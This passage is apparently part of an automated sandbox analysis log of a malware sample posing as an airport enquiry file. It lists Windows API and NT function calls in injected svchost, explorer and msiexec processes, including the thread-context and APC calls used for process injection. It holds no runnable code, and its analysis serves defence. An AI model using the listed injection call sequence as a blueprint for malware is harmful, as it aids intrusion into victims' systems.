          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C60 NtCreateKey,1_2_03072C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C70 NtFreeVirtualMemory,1_2_03072C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CC0 NtQueryVirtualMemory,1_2_03072CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CF0 NtOpenProcess,1_2_03072CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073010 NtOpenDirectoryObject,1_2_03073010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073090 NtSetValueKey,1_2_03073090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030735C0 NtCreateMutant,1_2_030735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030739B0 NtGetContextThread,1_2_030739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D10 NtOpenProcessToken,1_2_03073D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D70 NtOpenThread,1_2_03073D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A360 NtCreateFile,1_2_0268A360
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A410 NtReadFile,1_2_0268A410
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A490 NtClose,1_2_0268A490
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A540 NtAllocateVirtualMemory,1_2_0268A540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A35A NtCreateFile,1_2_0268A35A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A45A NtClose,1_2_0268A45A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A40D NtReadFile,1_2_0268A40D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A48A NtClose,1_2_0268A48A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A53C NtAllocateVirtualMemory,1_2_0268A53C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,1_2_035EA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA042 NtQueryInformationProcess,1_2_035EA042
          Source: C:\Windows\explorer.exeCode function: 2_2_0E692232 NtCreateFile,2_2_0E692232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E693E12 NtProtectVirtualMemory,2_2_0E693E12
          Source: C:\Windows\explorer.exeCode function: 2_2_0E693E0A NtProtectVirtualMemory,2_2_0E693E0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_009763E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,3_2_009763E3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022D10 NtMapViewOfSection,LdrInitializeThunk,3_2_05022D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022DD0 NtDelayExecution,LdrInitializeThunk,3_2_05022DD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_05022DF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022C60 NtCreateKey,LdrInitializeThunk,3_2_05022C60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_05022C70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_05022CA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022F30 NtCreateSection,LdrInitializeThunk,3_2_05022F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022FE0 NtCreateFile,LdrInitializeThunk,3_2_05022FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_05022EA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022B60 NtClose,LdrInitializeThunk,3_2_05022B60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022AD0 NtReadFile,LdrInitializeThunk,3_2_05022AD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050235C0 NtCreateMutant,LdrInitializeThunk,3_2_050235C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05024650 NtSuspendThread,3_2_05024650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05024340 NtSetContextThread,3_2_05024340
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022D00 NtSetInformationFile,3_2_05022D00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022D30 NtUnmapViewOfSection,3_2_05022D30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022DB0 NtEnumerateKey,3_2_05022DB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022C00 NtQueryInformationProcess,3_2_05022C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022CC0 NtQueryVirtualMemory,3_2_05022CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022CF0 NtOpenProcess,3_2_05022CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022F60 NtCreateProcessEx,3_2_05022F60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022F90 NtProtectVirtualMemory,3_2_05022F90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022FA0 NtQuerySection,3_2_05022FA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022FB0 NtResumeThread,3_2_05022FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022E30 NtWriteVirtualMemory,3_2_05022E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022E80 NtReadVirtualMemory,3_2_05022E80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022EE0 NtQueueApcThread,3_2_05022EE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022B80 NtQueryInformationFile,3_2_05022B80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022BA0 NtEnumerateValueKey,3_2_05022BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022BE0 NtQueryValueKey,3_2_05022BE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022BF0 NtAllocateVirtualMemory,3_2_05022BF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022AB0 NtWaitForSingleObject,3_2_05022AB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022AF0 NtWriteFile,3_2_05022AF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05023010 NtOpenDirectoryObject,3_2_05023010
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05023090 NtSetValueKey,3_2_05023090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05023D10 NtOpenProcessToken,3_2_05023D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05023D70 NtOpenThread,3_2_05023D70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050239B0 NtGetContextThread,3_2_050239B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A360 NtCreateFile,3_2_0311A360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A410 NtReadFile,3_2_0311A410
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A490 NtClose,3_2_0311A490
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A35A NtCreateFile,3_2_0311A35A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A40D NtReadFile,3_2_0311A40D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A45A NtClose,3_2_0311A45A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A48A NtClose,3_2_0311A48A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E6A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,3_2_04E6A036
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E69BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,3_2_04E69BAF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E6A042 NtQueryInformationProcess,3_2_04E6A042
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E69BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_04E69BB2
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00CE40B1
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CD8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00CD8858
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CE545F
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C8E8000_2_00C8E800
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CADBB50_2_00CADBB5
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C8FE400_2_00C8FE40
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00D0804A0_2_00D0804A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C8E0600_2_00C8E060
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C941400_2_00C94140
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA24050_2_00CA2405
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB65220_2_00CB6522
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB267E0_2_00CB267E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00D006650_2_00D00665
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C968430_2_00C96843
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA283A0_2_00CA283A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB89DF0_2_00CB89DF
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00D00AE20_2_00D00AE2
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB6A940_2_00CB6A94
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C98A0E0_2_00C98A0E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CDEB070_2_00CDEB07
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE8B130_2_00CE8B13
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CACD610_2_00CACD61
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB70060_2_00CB7006
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C931900_2_00C93190
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C9710E0_2_00C9710E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C812870_2_00C81287
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA33C70_2_00CA33C7
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CAF4190_2_00CAF419
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA16C40_2_00CA16C4
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C956800_2_00C95680
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C958C00_2_00C958C0
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA78D30_2_00CA78D3
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA1BB80_2_00CA1BB8
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CB9D050_2_00CB9D05
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CA1FD00_2_00CA1FD0
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CABFE60_2_00CABFE6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA3521_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F01_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031003E61_2_031003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E02741_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C02C01_2_030C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030301001_2_03030100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA1181_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C81581_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F41A21_2_030F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031001AA1_2_031001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F81CC1_2_030F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D20001_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030647501_2_03064750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030407701_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C01_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C6E01_2_0305C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030405351_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031005911_2_03100591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E44201_2_030E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F24461_2_030F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EE4F61_2_030EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB401_2_030FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F6BD71_2_030F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA801_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030569621_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A01_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310A9A61_2_0310A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304A8401_2_0304A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030428401_2_03042840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030268B81_2_030268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E8F01_2_0306E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03082F281_2_03082F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060F301_2_03060F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E2F301_2_030E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F401_2_030B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BEFA01_2_030BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032FC81_2_03032FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEE261_2_030FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040E591_2_03040E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052E901_2_03052E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FCE931_2_030FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEEDB1_2_030FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304AD001_2_0304AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DCD1F1_2_030DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03058DBF1_2_03058DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303ADE01_2_0303ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040C001_2_03040C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0CB51_2_030E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030CF21_2_03030CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F132D1_2_030F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D34C1_2_0302D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308739A1_2_0308739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A01_2_030452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C01_2_0305B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED1_2_030E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D2F01_2_0305D2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307516C1_2_0307516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F1721_2_0302F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B16B1_2_0310B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304B1B01_2_0304B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF0CC1_2_030EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C01_2_030470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F70E91_2_030F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF0E01_2_030FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF7B01_2_030FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030856301_2_03085630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC1_2_030F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F75711_2_030F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DD5B01_2_030DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031095C31_2_031095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF43F1_2_030FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030314601_2_03031460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFB761_2_030FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FB801_2_0305FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B5BF01_2_030B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307DBF91_2_0307DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFA491_2_030FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7A461_2_030F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B3A6C1_2_030B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DDAAC1_2_030DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03085AA01_2_03085AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E1AA31_2_030E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EDAC61_2_030EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D59101_2_030D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030499501_2_03049950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B9501_2_0305B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD8001_2_030AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030438E01_2_030438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFF091_2_030FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041F921_2_03041F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFFB11_2_030FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD21_2_03003FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD51_2_03003FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03049EB01_2_03049EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03043D401_2_03043D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F1D5A1_2_030F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7D731_2_030F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FDC01_2_0305FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B9C321_2_030B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFCF21_2_030FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268E3241_2_0268E324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268E1111_2_0268E111
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02672FB01_2_02672FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02672D901_2_02672D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026710301_2_02671030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268D8261_2_0268D826
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02679E601_2_02679E60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268DD7F1_2_0268DD7F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA0361_2_035EA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EB2321_2_035EB232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E10821_2_035E1082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EE5CD1_2_035EE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E5B321_2_035E5B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E5B301_2_035E5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E89121_2_035E8912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E2D021_2_035E2D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6922322_2_0E692232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6910362_2_0E691036
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6880822_2_0E688082
          Source: C:\Windows\explorer.exeCode function: 2_2_0E68CB302_2_0E68CB30
          Source: C:\Windows\explorer.exeCode function: 2_2_0E68CB322_2_0E68CB32
          Source: C:\Windows\explorer.exeCode function: 2_2_0E689D022_2_0E689D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0E68F9122_2_0E68F912
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6955CD2_2_0E6955CD
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC1CB302_2_0FC1CB30
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC1CB322_2_0FC1CB32
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC222322_2_0FC22232
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC255CD2_2_0FC255CD
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC19D022_2_0FC19D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC1F9122_2_0FC1F912
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC180822_2_0FC18082
          Source: C:\Windows\explorer.exeCode function: 2_2_0FC210362_2_0FC21036
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_009763E33_2_009763E3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050B05913_2_050B0591
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050944203_2_05094420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A24463_2_050A2446
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF05353_2_04FF0535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0509E4F63_2_0509E4F6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050147503_2_05014750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FEC7C03_2_04FEC7C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF07703_2_04FF0770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0500C6E03_2_0500C6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0508A1183_2_0508A118
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050781583_2_05078158
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050B01AA3_2_050B01AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A41A23_2_050A41A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A81CC3_2_050A81CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050820003_2_05082000
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FE01003_2_04FE0100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AA3523_2_050AA352
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050B03E63_2_050B03E6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FFE3F03_2_04FFE3F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050902743_2_05090274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050702C03_2_050702C0
